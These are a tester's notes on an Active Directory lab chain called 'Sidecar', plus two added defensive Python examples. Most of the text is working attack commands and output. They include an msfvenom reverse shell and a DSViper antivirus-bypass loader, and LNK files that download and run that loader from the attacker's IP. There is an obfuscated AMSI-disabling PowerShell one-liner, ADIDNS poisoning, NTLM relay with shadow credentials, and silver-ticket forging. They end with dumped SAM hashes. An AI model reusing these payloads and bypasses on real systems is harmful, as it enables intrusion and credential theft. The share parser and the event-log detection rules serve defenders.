Sidecar (Chain)
This is not a writeup, just my notes about the machine.

Operating System: Microsoft Windows Server 2022 Standard
Chain: True (2 Machines)
Credentials
svc_deploy
Aces&Eights
Dump SAM + LSA + Hashcat
Domain User
✅ Valid Usernames
svc_deploy
🔑 Passwords list
Aces&Eights
Information Gathering
Nmap Scan
Service Enumeration
10.10.220.53
DNS
Not vulnerable to DNS Zone Transfer
SMB (Enum4linux-ng)
Parent/Root Domain
NetBIOS: DC01
Domain: Sidecar.vl
FQDN: DC01.Sidecar.vl
Domain SID: S-1-5-21-3976908837-939936849-1028625813
SMB signing: true (Not vulnerable to NTLM Relay)
Server allows null session authentication
Server allows guest session authentication
10.10.220.54
SMB (Enum4linux-ng)
NetBIOS: WS01
FQDN: ws01.Sidecar.vl
SMB signing: false
(vulnerable to ntlm relay)
Compromising WS01
Discovering a share folder with excessive permission
During enumeration the tester found that guest authentication was enabled on the server, which allowed the SMB shares to be listed. Additionally, the Public share grants Read and Write permissions to the guest session.
❯ nxc smb DC01 -u 'Intrusionz3r0' -p '' --shares
SMB 10.10.220.53 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB 10.10.220.53 445 DC01 [+] Sidecar.vl\Intrusionz3r0: (Guest)
SMB 10.10.220.53 445 DC01 [*] Enumerated shares
SMB 10.10.220.53 445 DC01 Share Permissions Remark
SMB 10.10.220.53 445 DC01 ----- ----------- ------
SMB 10.10.220.53 445 DC01 ADMIN$ Remote Admin
SMB 10.10.220.53 445 DC01 C$ Default share
SMB 10.10.220.53 445 DC01 IPC$ READ Remote IPC
SMB 10.10.220.53 445 DC01 NETLOGON Logon server share
SMB 10.10.220.53 445 DC01 Public READ,WRITE
SMB 10.10.220.53 445 DC01 SYSVOL Logon server share
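As an added example (not part of these notes), the following Python parses nxc's `--shares` listing and reports which shares a guest or null session can read or write, which is the check that turns the listing above into a finding. The sample input is the output shown above embedded as a constant; the column layout (SMB, IP, port, host, share, optional permission token, remark) is assumed from that output.

```python
# Constructed sample: the nxc smb --shares output from the guest session above.
# Column layout assumed from that output: SMB <ip> <port> <host> <share> [perms] [remark].
SAMPLE_NXC_SHARES = """\
SMB 10.10.220.53 445 DC01 [*] Enumerated shares
SMB 10.10.220.53 445 DC01 Share Permissions Remark
SMB 10.10.220.53 445 DC01 ----- ----------- ------
SMB 10.10.220.53 445 DC01 ADMIN$ Remote Admin
SMB 10.10.220.53 445 DC01 C$ Default share
SMB 10.10.220.53 445 DC01 IPC$ READ Remote IPC
SMB 10.10.220.53 445 DC01 NETLOGON Logon server share
SMB 10.10.220.53 445 DC01 Public READ,WRITE
SMB 10.10.220.53 445 DC01 SYSVOL Logon server share
"""

PERM_TOKENS = ("READ", "WRITE", "READ,WRITE")


def parse_nxc_shares(text):
    """Return {share_name: set_of_permissions} from nxc smb --shares output.

    Columns are whitespace separated and the remark may contain spaces, so the
    share name is always the fifth token and the permission token, when the
    identity has any access, is the sixth and is one of READ, WRITE, READ,WRITE.
    A share without a permission token is one the session cannot open at all.
    """
    shares = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[0] != "SMB":
            continue
        share = parts[4]
        # Skip the header row, the separator row and status lines such as "[*] ...".
        if share in ("Share", "-----") or share.startswith("["):
            continue
        perms = set()
        if len(parts) > 5 and parts[5] in PERM_TOKENS:
            perms = set(parts[5].split(","))
        shares[share] = perms
    return shares


def writable_by_guest(text):
    """Shares the (guest/null) session can write to: the finding a defender acts on."""
    return sorted(name for name, perms in parse_nxc_shares(text).items() if "WRITE" in perms)


def readable_by_guest(text):
    """Shares the session can at least read; IPC$ READ is normal, data shares are not."""
    return sorted(name for name, perms in parse_nxc_shares(text).items() if "READ" in perms)


if __name__ == "__main__":
    print("guest-writable:", writable_by_guest(SAMPLE_NXC_SHARES))
    print("guest-readable:", readable_by_guest(SAMPLE_NXC_SHARES))
```

Run over a real `--shares` capture, the writable list is what should be empty for an unauthenticated identity; anything in it is a share to re-ACL or to disable guest access on.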
Initial foothold on WS01
Bypassing Windows Defender using DSViper
During enumeration the tester attempted to obtain a reverse shell, but the AV enabled on the system prevented the execution of malicious software. The tester proceeded to bypass the detection using DSViper.
Creating shellcode using msfvenom
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.5.48 LPORT=1234 -f raw > payload.bin
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Using DSViper to create final payload
❯ ./DSViper
░▒▓███████▓▒░ ░▒▓███████▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░ ░▒▓█▓▒▒▓█▓▒░░▒▓█▓▒░▒▓███████▓▒░░▒▓██████▓▒░ ░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▓█▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██▓▒░ ░▒▓█▓▒░▒▓█▓▒░ ░▒▓████████▓▒░▒▓█▓▒░░▒▓█▓▒░
................................................
AntiVirus Bypass Tool (v.0.2.1)
---------------------------------------------------------
Created by Dhanush Gowda(dagowda) and Sumanth Vankineni
---------------------------------------------------------
................................................
You sure you want to Continue?(Use it ethically, and in lab enviroments only) y/n: y
Enter your payload choice:
1.)self-injection(XOR)
2.)self-injection(AES)
3.)Process Injection(spoolsv)(Can be used for lateral movement)
4.)Process Hollow
5.)Self Deleting Malware(HAVE TO WAIT, CLOSE TO A MINUTE FOR THE PAYLOAD TO EXECUTE)
6.)DLL side-load/rundll32 applocker bypass
7.)Process Injection(explorer.exe)
8.)Powershell(Will bypass with cloud detections enabled as well)(Make sure to run this payload twice)(use x64 payload only)
9.)Applocker bypass small shellcodes(Make sure to use x86 payloads)(Also make sure to change the .exe file name after everyrun on the same victim)(Make sure you run this payload twice)
10.)Applocker bypass Havoc/large shellcodes(use x86 payloads only)
11.)Indirect Syscall(Windows 10)(Possible EDR bypass loader)
>1
Please type in the shellcode file name: payload.bin
Selected self-injection(XOR)
[*]Payload successfully created as DSViper_xor.exe
Creating malicious Lnk files
The tester proceeded to create two malicious Lnk files:
Download payload: C:\Windows\System32\cmd.exe /c powershell IWR http://10.8.5.48:8080/DSViper_xor.exe -Outfile C:\Windows\Temp\DSViper_xor.exe
Execute payload: C:\Windows\System32\cmd.exe /c C:\Windows\Temp\DSViper_xor.exe
Uploading the malicious files and obtaining a reverse shell on WS01

Compromising WS01 as Administrator
Enumerating Security Protections on WS01
C:\Windows\System32>wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState
displayName productState
Windows Defender 397568
C:\Windows\System32>cmd.exe /c powershell Get-MPComputerStatus | findstr "True"
AMServiceEnabled : True
AntispywareEnabled : True
AntivirusEnabled : True
BehaviorMonitorEnabled : True
IoavProtectionEnabled : True
NISEnabled : True
OnAccessProtectionEnabled : True
RealTimeProtectionEnabled : True
C:\Windows\System32>
Obtaining a reverse shell using Sliver
Undetectable payload:
c:\Temp> C:\Windows\System32\cmd.exe /c powershell IWR -URI http://10.8.5.48:8080/Loader.exe -Outfile C:\Temp\Loader.exe
c:\Temp> Loader.exe

Turning On WebDav
During post-exploitation enumeration the tester found that the WebClient (WebDAV) service was not running on WS01 and subsequently enabled it.
Starting WebClient service using net use
#Check whether the WebClient service is running
C:\Windows\System32> GetWebDAVStatus.exe WS01
[x] Unable to reach DAV pipe on WS01, system is either unreachable or does not have WebClient service running
#Start the WebClient service (WebDAV)
C:\Windows\System32> net use x: http://10.8.5.48/
C:\Windows\System32> GetWebDAVStatus.exe WS01
[+] WebClient service is active on WS01
Starting WebClient service using c2tc-startwebclient
sliver (COMBINED_AGLET) > c2tc-startwebclient
[*] Successfully executed c2tc-startwebclient (coff-loader)
[*] Got output:
[+] WebClient service started successfully.
NTLM Relay attack via WebDAV + Shadow Credentials
To successfully carry out this attack, the environment must have the following misconfigurations:
LDAP signing is not enforced
LDAPS channel binding is set to "Never"
MachineAccountQuota > 0; if not, proceed with Shadow Credentials instead.
Valid NetBIOS name resolution via Responder
Intranet zone conditions must be met, which means adding a record for our machine to the domain under the NetBIOS name provided by Responder.
1. Bypassing AMSI
Option #1: Using PowerJoker to obtain a stable PowerShell session and amsi.fail to generate PowerShell snippets that break or disable AMSI for the current process.
JokerShell C:\Windows\System32> $fTCfcRn66rylI=$null;$vjG66BCc="System.$([chaR]([bYte]0x4d)+[char](80+17)+[chAR](110*107/107)+[cHAR](9+88)+[chaR](103)+[CHAR](101+1-1)+[ChaR]([bytE]0x6d)+[ChaR](101)+[cHAR](110*95/95)+[cHAR]([bYTE]0x74)).$([CHaR]([byTE]0x41)+[chAR](113+4)+[chAR](116+102-102)+[Char](111*17/17)+[chaR]([BYtE]0x6d)+[char](97)+[cHaR]([BytE]0x74)+[cHar]([BYte]0x69)+[cHAr]([BYTE]0x6f)+[cHar](79+31)).$([Char](44+21)+[chAr]([BytE]0x6d)+[ChaR](19+96)+[chAr]([ByTe]0x69)+[CHAR](85*2/2)+[chAr](103+13)+[cHAr]([BYte]0x69)+[CHAr]([BYtE]0x6c)+[ChAr](115+21-21))";$bnhvzzbaphtc="+[ChaR](116*3/3)+[CHAR](114+109-109)+[ChAR](107+62-62)+[ChaR]([byTE]0x6c)+[CHaR](100*68/68)+[CHAr](122*107/107)+[ChAr]([BYtE]0x77)+[CHAR](106*44/44)+[cHaR](73+49)+[char]([bYTE]0x70)+[cHar](103*68/68)+[CHaR](16+106)+[chAR](104+34-34)+[cHaR](115)+[char]([bYTE]0x67)+[char](119*53/53)+[cHaR](77+22)+[cHAR]([BYTE]0x76)+[Char](112*9/9)+[CHaR]([BYtE]0x6a)+[cHar]([bYTe]0x6d)+[cHar](107*104/104)+[CHar](109+57-57)+[CHaR]([BYTE]0x63)+[Char](117*78/78)";[Threading.Thread]::Sleep(876);[Ref].Assembly.GetType($vjG66BCc).GetField($([cHAr](68+29)+[ChaR]([byTe]0x6d)+[ChAr]([ByTe]0x73)+[CHAR]([BYTe]0x69)+[cHaR](31+42)+[cHar]([BytE]0x6e)+[cHAR]([byTE]0x69)+[chAr]([ByTE]0x74)+[ChaR]([BYtE]0x46)+[CHaR](97+90-90)+[Char](105*98/98)+[ChaR]([bYte]0x6c)+[ChAr](101)+[cHaR](64+36)),"NonPublic,Static").SetValue($fTCfcRn66rylI,$true);$sjnzezl="+('èsèîny'+'wpyppl'+'fûvlhá'+'z').norMaLIZe([Char](70*18/18)+[chaR]([BYTe]0x6f)+[ChAr]([byTe]0x72)+[cHar]([BYte]0x6d)+[Char]([BYTE]0x44)) -replace [ChAR]([BytE]0x5c)+[cHAr]([bYte]0x70)+[Char]([bytE]0x7b)+[Char]([Byte]0x4d)+[cHar](110*59/59)+[chAr](125*98/98)";[Threading.Thread]::Sleep(579)
Option #2: Using Donut + UnmanagedPowerShell + Sliver
~/Documents/Tools/donut/donut -a 2 -i UnmanagedPowerShell.exe -o UnmanagedPowerShell.bin
[ Donut shellcode generator v1 (built Apr 30 2025 19:45:41)
[ Copyright (c) 2019-2021 TheWover, Odzhan
[ Instance type : Embedded
[ Module file : "UnmanagedPowerShell.exe"
[ Entropy : Random names + Encryption
[ File type : EXE
[ Target CPU : amd64
[ AMSI/WDLP/ETW : continue
[ PE Headers : overwrite
[ Shellcode : "UnmanagedPowerShell.bin"
[ Exit : Thread
sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin
[*] Started remote shell with pid 3284
PS >
2. Evaluating the environment to choose the attack path
Because ms-DS-MachineAccountQuota is set to 0, the tester proceeded with Shadow Credentials instead.
#Using StandIn
sliver (COMBINED_AGLET) > execute-assembly /home/Intrusionz3r0/Documents/Tools/StandIn_v13_Net45.exe --object ms-DS-MachineAccountQuota=*
#Using sharpview
sliver (COMBINED_AGLET) > sharpview -- Get-DomainObject -SearchBase "DC=sidecar,DC=vl" -LDAPFilter "(objectClass=domain)" -Properties ms-DS-MachineAccountQuota
ms-ds-machineaccountquota : 0
3. Starting Responder to generate a valid NetBIOS
❯ sudo responder -I tun0 -w -d
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Current Session Variables:
Responder Machine Name [WIN-BSET2PBW1EP]
Responder Domain Name [DLRP.LOCAL]
Responder DCE-RPC Port [48249]
Adding a malicious DNS record
Option #1: Using Sharpmad.exe via sliver
sliver (COMBINED_AGLET) > execute-assembly /home/Intrusionz3r0/Documents/Tools/Sharpmad.exe ADIDNS -Action new -Tombstone -Verbose -Node WIN-5MZA8QBSA8R -Data 10.8.5.48
[*] Output:
[+] Domain Controller = DC01.Sidecar.vl
[+] Domain = sidecar.vl
[+] Forest = sidecar.vl
[+] ADIDNS Zone = sidecar.vl
[+] Distinguished Name = DC=WIN-5MZA8QBSA8R,DC=sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=sidecar,DC=vl
[+] SOA serial number = 277
[+] DNSRecord = 04-00-01-00-05-F0-00-00-15-01-00-00-00-00-02-58-00-00-00-00-C4-C1-38-00-0A-08-05-30
[+] ADIDNS node WIN-BSET2PBW1EP added
Option #2: Using UnmanagedPowerShell.
This tool comes preloaded with PowerView, PowerUp, PowerUpSQL and Powermad.
sliver (COMBINED_AGLET) > execute-shellcode -i /home/Intrusionz3r0/Documents/Tools/UnmanagedPowerShell.bin
[*] Started remote shell with pid 2200
PS > New-ADIDNSNode -Tombstone -Verbose -Node WIN-BSET2PBW1EP -Data 10.8.5.48
VERBOSE: [+] Domain Controller = DC01.Sidecar.vl
VERBOSE: [+] Domain = Sidecar.vl
VERBOSE: [+] Forest = Sidecar.vl
VERBOSE: [+] ADIDNS Zone = Sidecar.vl
VERBOSE: [+] Distinguished Name = DC=WIN-BSET2PBW1EP,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDNSZones,DC=Sidecar,DC=vl
VERBOSE: [+] DNSRecord = 04-00-01-00-05-F0-00-00-1A-01-00-00-00-00-02-58-00-00-00-00-D5-C1-38-00-0A-08-05-30
[+] ADIDNS node WIN-BSET2PBW1EP added
Option #3: Using PowerJoker to obtain a stable PowerShell session and amsi.fail to generate PowerShell snippets that break or disable AMSI for the current process.
JokerShell C:\> $fTCfcRn66rylI=$null;$vjG66BCc="System.$([chaR]([bYte]0x4d)+[char](80+17)+[chAR](110*107/107)+[cHAR](9+88)+[chaR](103)+[CHAR](101+1-1)+[ChaR]([bytE]0x6d)+[ChaR](101)+[cHAR](110*95/95)+[cHAR]([bYTE]0x74)).$([CHaR]([byTE]0x41)+[chAR](113+4)+[chAR](116+102-102)+[Char](111*17/17)+[chaR]([BYtE]0x6d)+[char](97)+[cHaR]([BytE]0x74)+[cHar]([BYte]0x69)+[cHAr]([BYTE]0x6f)+[cHar](79+31)).$([Char](44+21)+[chAr]([BytE]0x6d)+[ChaR](19+96)+[chAr]([ByTe]0x69)+[CHAR](85*2/2)+[chAr](103+13)+[cHAr]([BYte]0x69)+[CHAr]([BYtE]0x6c)+[ChAr](115+21-21))";$bnhvzzbaphtc="+[ChaR](116*3/3)+[CHAR](114+109-109)+[ChAR](107+62-62)+[ChaR]([byTE]0x6c)+[CHaR](100*68/68)+[CHAr](122*107/107)+[ChAr]([BYtE]0x77)+[CHAR](106*44/44)+[cHaR](73+49)+[char]([bYTE]0x70)+[cHar](103*68/68)+[CHaR](16+106)+[chAR](104+34-34)+[cHaR](115)+[char]([bYTE]0x67)+[char](119*53/53)+[cHaR](77+22)+[cHAR]([BYTE]0x76)+[Char](112*9/9)+[CHaR]([BYtE]0x6a)+[cHar]([bYTe]0x6d)+[cHar](107*104/104)+[CHar](109+57-57)+[CHaR]([BYTE]0x63)+[Char](117*78/78)";[Threading.Thread]::Sleep(876);[Ref].Assembly.GetType($vjG66BCc).GetField($([cHAr](68+29)+[ChaR]([byTe]0x6d)+[ChAr]([ByTe]0x73)+[CHAR]([BYTe]0x69)+[cHaR](31+42)+[cHar]([BytE]0x6e)+[cHAR]([byTE]0x69)+[chAr]([ByTE]0x74)+[ChaR]([BYtE]0x46)+[CHaR](97+90-90)+[Char](105*98/98)+[ChaR]([bYte]0x6c)+[ChAr](101)+[cHaR](64+36)),"NonPublic,Static").SetValue($fTCfcRn66rylI,$true);$sjnzezl="+('èsèîny'+'wpyppl'+'fûvlhá'+'z').norMaLIZe([Char](70*18/18)+[chaR]([BYTe]0x6f)+[ChAr]([byTe]0x72)+[cHar]([BYte]0x6d)+[Char]([BYTE]0x44)) -replace [ChAR]([BytE]0x5c)+[cHAr]([bYte]0x70)+[Char]([bytE]0x7b)+[Char]([Byte]0x4d)+[cHar](110*59/59)+[chAr](125*98/98)";[Threading.Thread]::Sleep(579)
JokerShell C:\> Import-Module .\Powermad.ps1
JokerShell C:\> New-ADIDNSNode -Tombstone -Verbose -Node WIN-BSET2PBW1EP -DATA 10.8.5.48
Running ntlmrelayx to redirect the authentication
❯ ntlmrelayx.py -t ldaps://DC01.sidecar.vl -smb2support --adcs --shadow-credentials --shadow-target ws01\$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
Coercing authentication from WS01 and relaying it to the domain controller
sliver (COMBINED_AGLET) > execute-assembly /home/Intrusionz3r0/Documents/Tools/SpoolSample.exe 10.10.220.54 "WIN-BSET2PBW1EP@80/Intrusionz3r0.txt"
Output:
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] HTTPD(80): Connection from 10.10.220.54 controlled, attacking target ldaps://DC01.sidecar.vl
[*] HTTPD(80): Client requested path: /intrusionz3r0.txt/pipe/spoolss
[*] Searching for the target account
[*] Target user found: CN=WS01,CN=Computers,DC=Sidecar,DC=vl
[*] Generating certificate
[*] HTTPD(80): Authenticating against ldaps://DC01.sidecar.vl as SIDECAR/WS01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Certificate generated
[*] Generating KeyCredential
[*] Updating the msDS-KeyCredentialLink attribute of ws01$
[*] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Saved PFX (#PKCS12) certificate & key at path: jwtHNq1B.pfx
[*] Must be used with password: ogkkN1eOSsZYekxP3yoK
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
[*] Run the following command to obtain a TGT
[*] python3 PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK Sidecar.vl/ws01$ jwtHNq1B.ccache
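On the defensive side of the two steps above (the ADIDNS node added with Powermad/Sharpmad, and the msDS-KeyCredentialLink write that ntlmrelayx performs against the WS01$ object), both actions land in the Security log as Directory Service Changes events when "Audit Directory Service Changes" is enabled and the objects carry a SACL: 5137 for the created dnsNode and 5136 for the value added to the computer object. The following Python is an added example, not from these notes or from any tool on the page; the events are constructed dicts using the EventData field names of those events, with DNs modelled on the ones shown above, and the `%%14674` "Value Added" operation code is an assumption about the message id Windows renders for 5136.

```python
from dataclasses import dataclass

# Constructed sample events shaped like Security log "Directory Service Changes"
# records: 5137 = directory object created, 5136 = directory object modified.
# Keys follow the EventData field names of those events; the values are made up
# here, modelled on the DNs that appear in the notes above.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "WS01$", "ObjectClass": "dnsNode",
     "ObjectDN": "DC=WIN-BSET2PBW1EP,DC=Sidecar.vl,CN=MicrosoftDNS,DC=DomainDnsZones,DC=Sidecar,DC=vl"},
    {"EventID": 5136, "SubjectUserName": "WS01$", "ObjectClass": "computer",
     "ObjectDN": "CN=WS01,CN=Computers,DC=Sidecar,DC=vl",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "OperationType": "%%14674",
     "AttributeValue": "B:16:0123456789ABCDEF:CN=WS01,CN=Computers,DC=Sidecar,DC=vl"},
    {"EventID": 5136, "SubjectUserName": "svc_deploy", "ObjectClass": "user",
     "ObjectDN": "CN=E.Klaymore,CN=Users,DC=Sidecar,DC=vl",
     "AttributeLDAPDisplayName": "description",
     "OperationType": "%%14674",
     "AttributeValue": "Helpdesk"},
]

# Assumption: OperationType %%14674 is the message id rendered as "Value Added"
# (and %%14675 as "Value Deleted") in 5136 events.
VALUE_ADDED = "%%14674"


@dataclass
class Finding:
    rule: str
    actor: str
    target: str
    self_write: bool  # the actor changed its own account object


def rdn_value(dn):
    """First RDN value of a DN: 'CN=WS01,CN=Computers,...' -> 'WS01'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else ""


def make_finding(rule, event):
    actor, target = event["SubjectUserName"], event["ObjectDN"]
    self_write = actor.rstrip("$").lower() == rdn_value(target).lower()
    return Finding(rule, actor, target, self_write)


def detect_shadow_credentials(event):
    """5136 adding a value to msDS-KeyCredentialLink links a new key to the account.
    Expected writers are device registration / Windows Hello for Business; a
    computer account writing its own link after a relayed logon is not one."""
    if event.get("EventID") != 5136:
        return None
    if event.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
        return None
    if event.get("OperationType") != VALUE_ADDED:
        return None
    return make_finding("msDS-KeyCredentialLink value added", event)


def detect_adidns_node(event):
    """5137 creating a dnsNode under CN=MicrosoftDNS: by default any authenticated
    user may do this, so a node created by an ordinary user or workstation account
    rather than a DNS server deserves review."""
    if event.get("EventID") != 5137 or event.get("ObjectClass") != "dnsNode":
        return None
    if "CN=MicrosoftDNS" not in event.get("ObjectDN", ""):
        return None
    return make_finding("ADIDNS node created", event)


RULES = (detect_adidns_node, detect_shadow_credentials)


def run_rules(events):
    """Apply every rule to every event; findings come back in event order."""
    findings = []
    for event in events:
        for rule in RULES:
            finding = rule(event)
            if finding is not None:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in run_rules(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.actor} -> {f.target} (self-write={f.self_write})")
```

The `self_write` flag is the cheap high-signal filter for the second rule: legitimate key-credential writes come from the device-registration service or an admin, not from the account whose link is being changed. Without the audit policy and a SACL on the Computers container (and on the MicrosoftDNS container for the first rule), neither event is generated at all, so the policy check comes before the rule.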
Requesting a Kerberos TGT Using Certificate-Based Authentication (PKINIT)
❯ python3 ~/Documents/Tools/PKINITtools/gettgtpkinit.py -cert-pfx jwtHNq1B.pfx -pfx-pass ogkkN1eOSsZYekxP3yoK 'Sidecar.vl/ws01$' jwtHNq1B.ccache
2025-05-02 16:52:42,718 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-05-02 16:52:42,730 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-05-02 16:52:58,213 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-05-02 16:52:58,213 minikerberos INFO 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
INFO:minikerberos:6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9
2025-05-02 16:52:58,215 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
Retrieving the NT hash of the WS01$ computer account
❯ KRB5CCNAME='jwtHNq1B.ccache' python3 ~/Documents/Tools/PKINITtools/getnthash.py -k 6063c92baf58fc52163b03a9437cc1126e92ab220743408bf7a733f213908ec9 'Sidecar.vl/ws01$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
31fc45654028564d0ceda3817829d52f
Obtaining Domain Controller SID
#UnmanagedPowerShell
PS > Get-DomainSID
S-1-5-21-3976908837-939936849-1028625813
#Using Sharpview
sliver (COMBINED_AGLET) > sharpview -- Get-DomainSID
[*] sharpview output:
[Get-DomainSearcher] search base: LDAP://DC=SIDECAR,DC=VL
[Get-DomainComputer] Using additional LDAP filter: (userAccountControl:1.2.840.113556.1.4.803:=8192)
[Get-DomainComputer] Get-DomainComputer filter string: (&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=8192))
S-1-5-21-3976908837-939936849-1028625813
Crafting Silver ticket for Local Administrator via S4U
#From Windows using rubeus.exe
Rubeus.exe asktgt /nowrap /user:"ws01$" /rc4:31fc45654028564d0ceda3817829d52f
Rubeus.exe s4u /self /nowrap /impersonateuser:Administrator /altservice:"host/ws01.sidecar.vl" /ticket:<ticket>
# From Linux
#Using PKINITtools
❯ python3 gets4uticket.py kerberos+ccache://sidecar.vl\\WS01\$:jwtHNq1B.ccache@DC01.sidecar.vl host/WS01.sidecar.vl@sidecar.vl Administrator@sidecar.vl Administrator.ccache -v
INFO:minikerberos:Trying to get SPN with Administrator@sidecar.vl for host/WS01.sidecar.vl@sidecar.vl
2024-02-16 01:41:58,209 minikerberos INFO Success!
INFO:minikerberos:Success!
2024-02-16 01:41:58,209 minikerberos INFO Done!
INFO:minikerberos:Done!
#Using impacket toolkit
❯ impacket-ticketer -domain-sid S-1-5-21-3976908837-939936849-1028625813 -nthash 31fc45654028564d0ceda3817829d52f -domain sidecar.vl -spn host/ws01.sidecar.vl -user-id 500 administrator 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for sidecar.vl/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
Dumping local SAM hashes and LSA secrets on WS01
❯ KRB5CCNAME='administrator.ccache' impacket-secretsdump -k -no-pass WS01.sidecar.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1e7d0e7d432413f4ac3097f112b17322
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a7eb14088fd30c1af40ff91acd7734ce:::
Gast:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Admin:1000:aad3b435b51404eeaad3b435b51404ee:09e8df317667fc45698f7db80c58fd3f:::
Deployer:1001:aad3b435b51404eeaad3b435b51404ee:c5ad69fd899918450831c9d2b23f27a1:::
[*] Dumping cached domain logon information (domain/username:hash)
SIDECAR.VL/E.Klaymore:$DCC2$10240#E.Klaymore#66e0fb1767fe4f00983784904ad42579: (2025-05-02 21:01:00)
SIDECAR.VL/Administrator:$DCC2$10240#Administrator#0105946ef533599c2b1b769f3d9016dd: (2023-12-02 11:27:44)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
